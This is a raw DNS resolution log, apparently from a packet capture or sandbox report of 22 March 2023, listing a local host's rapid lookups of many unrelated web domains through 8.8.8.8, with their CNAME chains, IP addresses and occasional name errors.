Mar 22, 2023 05:43:11.210974932 CET	8.8.8.8	192.168.2.5	0xf397	No error (0)	traff-6.hugedomains.com	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:11.210974932 CET	8.8.8.8	192.168.2.5	0xf397	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		18.119.154.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.210974932 CET	8.8.8.8	192.168.2.5	0xf397	No error (0)	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com		3.140.13.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.352726936 CET	8.8.8.8	192.168.2.5	0x4b64	No error (0)	www.ora.ecnet.jp	ora.ecnet.jp		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:11.352726936 CET	8.8.8.8	192.168.2.5	0x4b64	No error (0)	ora.ecnet.jp		60.43.154.138	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.702908993 CET	8.8.8.8	192.168.2.5	0xe321	No error (0)	www.aevga.com	aevga.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:11.702908993 CET	8.8.8.8	192.168.2.5	0xe321	No error (0)	aevga.com		108.167.164.216	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.709394932 CET	8.8.8.8	192.168.2.5	0xcbe9	No error (0)	www.waldi.pl	waldi.pl		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:11.709394932 CET	8.8.8.8	192.168.2.5	0xcbe9	No error (0)	waldi.pl		46.242.238.60	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.722240925 CET	8.8.8.8	192.168.2.5	0x88eb	No error (0)	www.synetik.net	synetik.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:11.722240925 CET	8.8.8.8	192.168.2.5	0x88eb	No error (0)	synetik.net		193.166.255.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:11.747286081 CET	8.8.8.8	192.168.2.5	0xce5d	No error (0)	www.sjbs.org	sjbs.org		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:11.747286081 CET	8.8.8.8	192.168.2.5	0xce5d	No error (0)	sjbs.org		69.163.239.62	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:12.046917915 CET	8.8.8.8	192.168.2.5	0xaf22	No error (0)	www.yocinc.org		66.94.119.160	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:12.058552980 CET	8.8.8.8	192.168.2.5	0xf917	No error (0)	www.holleman.us		51.79.51.72	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:12.734935999 CET	8.8.8.8	192.168.2.5	0xda2e	No error (0)	www.fink.com		69.163.218.51	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:12.821686983 CET	8.8.8.8	192.168.2.5	0xa24e	Name error (3)	www.udesign.biz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:12.829731941 CET	8.8.8.8	192.168.2.5	0xca57	No error (0)	www.stnic.co.uk		77.68.50.105	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:12.912007093 CET	8.8.8.8	192.168.2.5	0x3a24	No error (0)	www.netcr.com	traff-5.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:12.912007093 CET	8.8.8.8	192.168.2.5	0x3a24	No error (0)	traff-5.hugedomains.com	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:12.912007093 CET	8.8.8.8	192.168.2.5	0x3a24	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		54.161.222.85	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:12.912007093 CET	8.8.8.8	192.168.2.5	0x3a24	No error (0)	hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com		34.205.242.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:12.935159922 CET	8.8.8.8	192.168.2.5	0x6119	No error (0)	www.maktraxx.com	maktraxx.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:12.935159922 CET	8.8.8.8	192.168.2.5	0x6119	No error (0)	maktraxx.com		72.44.93.236	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.109704018 CET	8.8.8.8	192.168.2.5	0x1685	No error (0)	www.jacomfg.com		96.127.180.42	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.248903036 CET	8.8.8.8	192.168.2.5	0xe162	No error (0)	www.speelhal.net		217.19.237.54	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.300698042 CET	8.8.8.8	192.168.2.5	0xd223	Name error (3)	www.medisa.info	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.483906031 CET	8.8.8.8	192.168.2.5	0xfbd6	No error (0)	www.findbc.com		13.248.216.40	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.483906031 CET	8.8.8.8	192.168.2.5	0xfbd6	No error (0)	www.findbc.com		76.223.65.111	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.536900997 CET	8.8.8.8	192.168.2.5	0x51c9	No error (0)	www.gpthink.com		39.99.233.155	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.593971968 CET	8.8.8.8	192.168.2.5	0x79d3	No error (0)	www.cel-cpa.com		104.196.26.65	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.635991096 CET	8.8.8.8	192.168.2.5	0x31ae	No error (0)	www.mobilnic.net		154.203.14.100	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.887516975 CET	8.8.8.8	192.168.2.5	0xe81c	No error (0)	www.lrsuk.com	language-recruitment.eu-2.volcanic.cloud		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:13.887516975 CET	8.8.8.8	192.168.2.5	0xe81c	No error (0)	language-recruitment.eu-2.volcanic.cloud	d2kt7vovxa5e81.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:13.887516975 CET	8.8.8.8	192.168.2.5	0xe81c	No error (0)	d2kt7vovxa5e81.cloudfront.net		13.225.78.34	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.887516975 CET	8.8.8.8	192.168.2.5	0xe81c	No error (0)	d2kt7vovxa5e81.cloudfront.net		13.225.78.42	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.887516975 CET	8.8.8.8	192.168.2.5	0xe81c	No error (0)	d2kt7vovxa5e81.cloudfront.net		13.225.78.126	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.887516975 CET	8.8.8.8	192.168.2.5	0xe81c	No error (0)	d2kt7vovxa5e81.cloudfront.net		13.225.78.62	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:13.891627073 CET	8.8.8.8	192.168.2.5	0x9f5	No error (0)	www.jchysk.com		208.97.178.138	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:14.046544075 CET	8.8.8.8	192.168.2.5	0xccbe	No error (0)	www.nqks.com	live.websites.hibu.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:14.046544075 CET	8.8.8.8	192.168.2.5	0xccbe	No error (0)	live.websites.hibu.com	hibu-4.zenedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:14.046544075 CET	8.8.8.8	192.168.2.5	0xccbe	No error (0)	hibu-4.zenedge.net	zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:14.046544075 CET	8.8.8.8	192.168.2.5	0xccbe	No error (0)	zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.net	hibu34.inregion.waas.oci.oraclecloud.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:14.046544075 CET	8.8.8.8	192.168.2.5	0xccbe	No error (0)	hibu34.inregion.waas.oci.oraclecloud.net		147.154.3.56	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:14.411442995 CET	8.8.8.8	192.168.2.5	0xba0e	No error (0)	www.c9dd.com		188.166.152.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:14.446605921 CET	8.8.8.8	192.168.2.5	0x9f10	No error (0)	www.fe-bauer.de		3.65.101.129	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:14.570655107 CET	8.8.8.8	192.168.2.5	0xe411	No error (0)	www.usadig.com		198.100.146.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:14.588301897 CET	8.8.8.8	192.168.2.5	0xa845	No error (0)	www.myropcb.com		74.208.215.199	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:14.850950956 CET	8.8.8.8	192.168.2.5	0xe0b8	No error (0)	www.dayvo.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:14.850950956 CET	8.8.8.8	192.168.2.5	0xe0b8	No error (0)	www.dayvo.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:14.867249966 CET	8.8.8.8	192.168.2.5	0x14a9	No error (0)	www.domon.com	meubles-domon.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:14.867249966 CET	8.8.8.8	192.168.2.5	0x14a9	No error (0)	meubles-domon.myshopify.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:14.867249966 CET	8.8.8.8	192.168.2.5	0x14a9	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:15.006335974 CET	8.8.8.8	192.168.2.5	0x2d96	Name error (3)	www.koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:15.230683088 CET	8.8.8.8	192.168.2.5	0x594a	No error (0)	www.pwd.org	pwd.org		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:15.230683088 CET	8.8.8.8	192.168.2.5	0x594a	No error (0)	pwd.org		208.109.214.162	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:15.407555103 CET	8.8.8.8	192.168.2.5	0xbf15	No error (0)	www.vitaindu.com		122.128.109.107	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:15.440802097 CET	8.8.8.8	192.168.2.5	0xcac5	No error (0)	www.stajum.com		103.3.1.161	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:15.495408058 CET	8.8.8.8	192.168.2.5	0xbf15	No error (0)	www.vitaindu.com		122.128.109.107	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:15.761698961 CET	8.8.8.8	192.168.2.5	0xdbbf	No error (0)	www.kernsafe.com		172.67.72.98	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:15.761698961 CET	8.8.8.8	192.168.2.5	0xdbbf	No error (0)	www.kernsafe.com		104.26.3.124	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:15.761698961 CET	8.8.8.8	192.168.2.5	0xdbbf	No error (0)	www.kernsafe.com		104.26.2.124	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:16.441445112 CET	8.8.8.8	192.168.2.5	0xbf15	No error (0)	www.vitaindu.com		122.128.109.107	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:20.370487928 CET	8.8.8.8	192.168.2.5	0x3c79	No error (0)	www.valselit.com		193.70.68.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:20.370738029 CET	8.8.8.8	192.168.2.5	0x3755	No error (0)	www.pupi.cz		103.224.182.241	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:20.537723064 CET	8.8.8.8	192.168.2.5	0xcd98	No error (0)	www.iamdirt.com	gcdn0.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:20.537723064 CET	8.8.8.8	192.168.2.5	0xcd98	No error (0)	gcdn0.wixdns.net	td-ccm-168-233.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:20.537723064 CET	8.8.8.8	192.168.2.5	0xcd98	No error (0)	td-ccm-168-233.wixdns.net		34.117.168.233	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:20.561450005 CET	8.8.8.8	192.168.2.5	0x5d3d	No error (0)	www.yoruksut.com		93.187.206.66	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:20.679981947 CET	8.8.8.8	192.168.2.5	0xb26f	No error (0)	www.ex-olive.com		210.140.73.39	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:20.894243956 CET	8.8.8.8	192.168.2.5	0x5231	No error (0)	www.2print.com	2print.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:20.894243956 CET	8.8.8.8	192.168.2.5	0x5231	No error (0)	2print.com		107.180.98.101	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:20.988955975 CET	8.8.8.8	192.168.2.5	0x3060	No error (0)	www.wifi4all.nl		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:20.988955975 CET	8.8.8.8	192.168.2.5	0x3060	No error (0)	www.wifi4all.nl		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:21.387929916 CET	8.8.8.8	192.168.2.5	0x1082	No error (0)	www.fcwcvt.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:21.387929916 CET	8.8.8.8	192.168.2.5	0x1082	No error (0)	www.fcwcvt.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:21.444678068 CET	8.8.8.8	192.168.2.5	0x9b30	No error (0)	www.wnsavoy.com		96.91.204.114	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:21.568581104 CET	8.8.8.8	192.168.2.5	0x2afc	No error (0)	www.x0c.com		185.53.177.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:22.274032116 CET	8.8.8.8	192.168.2.5	0x785a	Name error (3)	www.yumgiskor.kz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:22.276182890 CET	8.8.8.8	192.168.2.5	0x15b8	No error (0)	www.snugpak.com		104.21.73.182	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:22.276182890 CET	8.8.8.8	192.168.2.5	0x15b8	No error (0)	www.snugpak.com		172.67.165.62	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:22.641026020 CET	8.8.8.8	192.168.2.5	0x4230	No error (0)	www.photo4b.com		195.78.66.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:22.970084906 CET	8.8.8.8	192.168.2.5	0x7c78	No error (0)	www.crcsi.org	crcsi.org		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:22.970084906 CET	8.8.8.8	192.168.2.5	0x7c78	No error (0)	crcsi.org		165.227.252.190	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:23.395515919 CET	8.8.8.8	192.168.2.5	0xd941	No error (0)	www.ora-ito.com		213.186.33.40	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.808522940 CET	8.8.8.8	192.168.2.5	0x7304	No error (0)	www.olras.com		80.93.82.33	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.810120106 CET	8.8.8.8	192.168.2.5	0x4288	No error (0)	www.baijaku.com	baijaku.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:25.810120106 CET	8.8.8.8	192.168.2.5	0x4288	No error (0)	baijaku.com		59.106.19.204	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.813308001 CET	8.8.8.8	192.168.2.5	0xd3f0	Name error (3)	www.wkhk.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.818214893 CET	8.8.8.8	192.168.2.5	0x331c	No error (0)	www.jenco.co.uk		104.21.23.9	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.818214893 CET	8.8.8.8	192.168.2.5	0x331c	No error (0)	www.jenco.co.uk		172.67.208.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.824626923 CET	8.8.8.8	192.168.2.5	0x687d	No error (0)	www.pdqhomes.com	traff-2.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:25.824626923 CET	8.8.8.8	192.168.2.5	0x687d	No error (0)	traff-2.hugedomains.com	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:25.824626923 CET	8.8.8.8	192.168.2.5	0x687d	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.253.23	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.824626923 CET	8.8.8.8	192.168.2.5	0x687d	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.204.160	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.836380959 CET	8.8.8.8	192.168.2.5	0xfde9	No error (0)	www.dgmna.com	dgmna.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:25.836380959 CET	8.8.8.8	192.168.2.5	0xfde9	No error (0)	dgmna.com		192.124.249.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.836500883 CET	8.8.8.8	192.168.2.5	0xbad4	No error (0)	www.fnw.us	fnw.us		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:25.836500883 CET	8.8.8.8	192.168.2.5	0xbad4	No error (0)	fnw.us		137.118.26.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.837316036 CET	8.8.8.8	192.168.2.5	0x3e4f	No error (0)	www.quadlock.com	quadlock.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:25.837316036 CET	8.8.8.8	192.168.2.5	0x3e4f	No error (0)	quadlock.com		70.39.251.249	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:25.840586901 CET	8.8.8.8	192.168.2.5	0xd5ef	Server failure (2)	www.ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.069297075 CET	8.8.8.8	192.168.2.5	0x9401	No error (0)	www.rs-ag.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.069297075 CET	8.8.8.8	192.168.2.5	0x9401	No error (0)	www.rs-ag.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.075246096 CET	8.8.8.8	192.168.2.5	0x5517	No error (0)	www.pr-park.com		118.27.125.181	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.274784088 CET	8.8.8.8	192.168.2.5	0x35d7	No error (0)	www.mqs.com.br	www.mqs.com.br.cdn.gocache.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:26.274784088 CET	8.8.8.8	192.168.2.5	0x35d7	No error (0)	www.mqs.com.br.cdn.gocache.net		170.82.173.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.274784088 CET	8.8.8.8	192.168.2.5	0x35d7	No error (0)	www.mqs.com.br.cdn.gocache.net		170.82.174.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.536302090 CET	8.8.8.8	192.168.2.5	0x1fb5	No error (0)	www.alteor.cl	gcdn0.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:26.536302090 CET	8.8.8.8	192.168.2.5	0x1fb5	No error (0)	gcdn0.wixdns.net	td-ccm-168-233.wixdns.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:26.536302090 CET	8.8.8.8	192.168.2.5	0x1fb5	No error (0)	td-ccm-168-233.wixdns.net		34.117.168.233	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.542152882 CET	8.8.8.8	192.168.2.5	0x252c	No error (0)	www.valdal.com		172.67.73.176	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.542152882 CET	8.8.8.8	192.168.2.5	0x252c	No error (0)	www.valdal.com		104.26.6.221	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.542152882 CET	8.8.8.8	192.168.2.5	0x252c	No error (0)	www.valdal.com		104.26.7.221	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.556565046 CET	8.8.8.8	192.168.2.5	0x77fe	No error (0)	www.item-pr.com	item-pr.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:26.556565046 CET	8.8.8.8	192.168.2.5	0x77fe	No error (0)	item-pr.com		213.186.33.17	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.556565046 CET	8.8.8.8	192.168.2.5	0x77fe	No error (0)	item-pr.com		185.15.129.58	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.577183008 CET	8.8.8.8	192.168.2.5	0x3354	No error (0)	www.depalo.com	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:26.577183008 CET	8.8.8.8	192.168.2.5	0x3354	No error (0)	ghs.googlehosted.com		142.250.186.179	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.673377991 CET	8.8.8.8	192.168.2.5	0xee12	No error (0)	www.vazir.se		206.191.152.37	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:26.709961891 CET	8.8.8.8	192.168.2.5	0xbdcf	No error (0)	www.credo.edu.pl		62.122.190.121	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.346791983 CET	8.8.8.8	192.168.2.5	0x1869	No error (0)	www.nunomira.com	nunomira.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:27.346791983 CET	8.8.8.8	192.168.2.5	0x1869	No error (0)	nunomira.com		192.241.158.94	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.348467112 CET	8.8.8.8	192.168.2.5	0x95de	No error (0)	www.elpro.si		104.26.15.53	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.348467112 CET	8.8.8.8	192.168.2.5	0x95de	No error (0)	www.elpro.si		172.67.70.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.348467112 CET	8.8.8.8	192.168.2.5	0x95de	No error (0)	www.elpro.si		104.26.14.53	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.361430883 CET	8.8.8.8	192.168.2.5	0xb139	No error (0)	www.petsfan.com	traff-4.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:27.361430883 CET	8.8.8.8	192.168.2.5	0xb139	No error (0)	traff-4.hugedomains.com	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:27.361430883 CET	8.8.8.8	192.168.2.5	0xb139	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		52.86.6.113	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.361430883 CET	8.8.8.8	192.168.2.5	0xb139	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		3.94.41.167	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.387406111 CET	8.8.8.8	192.168.2.5	0x1f8c	No error (0)	www.otena.com		99.83.154.118	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.412976980 CET	8.8.8.8	192.168.2.5	0xe8b3	Name error (3)	www.owsports.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.540858030 CET	8.8.8.8	192.168.2.5	0x838f	No error (0)	www.transsib.com	www.studyrussian.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:27.540858030 CET	8.8.8.8	192.168.2.5	0x838f	No error (0)	www.studyrussian.com	studyrussian.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:27.540858030 CET	8.8.8.8	192.168.2.5	0x838f	No error (0)	studyrussian.com		80.74.154.6	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.545564890 CET	8.8.8.8	192.168.2.5	0x499	No error (0)	www.tvtools.fi		104.21.88.198	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.545564890 CET	8.8.8.8	192.168.2.5	0x499	No error (0)	www.tvtools.fi		172.67.152.159	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.578468084 CET	8.8.8.8	192.168.2.5	0xa1e6	No error (0)	www.abart.pl	abart.pl		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:27.578468084 CET	8.8.8.8	192.168.2.5	0xa1e6	No error (0)	abart.pl		89.161.163.246	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.590472937 CET	8.8.8.8	192.168.2.5	0xcb37	No error (0)	www.nelipak.nl		82.201.61.230	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:27.610785007 CET	8.8.8.8	192.168.2.5	0x8f7c	No error (0)	www.t-tre.com		135.181.73.98	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.336416006 CET	8.8.8.8	192.168.2.5	0x7377	No error (0)	www.evcpa.com	evcpa.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:28.336416006 CET	8.8.8.8	192.168.2.5	0x7377	No error (0)	evcpa.com		192.124.249.10	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.420216084 CET	8.8.8.8	192.168.2.5	0x9d41	No error (0)	www.edimart.hu		81.2.194.241	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.422759056 CET	8.8.8.8	192.168.2.5	0x84dc	Name error (3)	www.jroy.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.442102909 CET	8.8.8.8	192.168.2.5	0x85ac	No error (0)	www.abdg.com		192.252.154.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.527002096 CET	8.8.8.8	192.168.2.5	0x4183	No error (0)	www.cokocoko.com	traff-1.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:28.527002096 CET	8.8.8.8	192.168.2.5	0x4183	No error (0)	traff-1.hugedomains.com	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:28.527002096 CET	8.8.8.8	192.168.2.5	0x4183	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		52.71.57.184	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.527002096 CET	8.8.8.8	192.168.2.5	0x4183	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		54.209.32.212	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.573904991 CET	8.8.8.8	192.168.2.5	0xcd51	No error (0)	www.ora.ecnet.jp	ora.ecnet.jp		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:28.573904991 CET	8.8.8.8	192.168.2.5	0xcd51	No error (0)	ora.ecnet.jp		60.43.154.138	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.590939045 CET	8.8.8.8	192.168.2.5	0xd7ac	No error (0)	www.naoi-a.com		202.254.236.40	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.771644115 CET	8.8.8.8	192.168.2.5	0xd09c	No error (0)	www.vexcom.com		172.67.173.200	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.771644115 CET	8.8.8.8	192.168.2.5	0xd09c	No error (0)	www.vexcom.com		104.21.55.224	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.780380964 CET	8.8.8.8	192.168.2.5	0x5aca	No error (0)	www.xaicom.es	xaicom.es		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:28.780380964 CET	8.8.8.8	192.168.2.5	0x5aca	No error (0)	xaicom.es		188.165.133.163	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:28.794641018 CET	8.8.8.8	192.168.2.5	0x4871	No error (0)	www.hummer.hu	hummer.hu		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:28.794641018 CET	8.8.8.8	192.168.2.5	0x4871	No error (0)	hummer.hu		185.80.51.179	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.306534052 CET	8.8.8.8	192.168.2.5	0xc0c9	No error (0)	www.medius.si	d2r2uj0bnofxxz.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:43:29.306534052 CET	8.8.8.8	192.168.2.5	0xc0c9	No error (0)	d2r2uj0bnofxxz.cloudfront.net		65.9.95.48	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.306534052 CET	8.8.8.8	192.168.2.5	0xc0c9	No error (0)	d2r2uj0bnofxxz.cloudfront.net		65.9.95.95	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:43:29.306534052 CET	8.8.8.8	192.168.2.5	0xc0c9	No error (0)	d2r2uj0bnofxxz.cloudfront.net		65.9.95.32	A (IP address)	IN (0x0001)	false
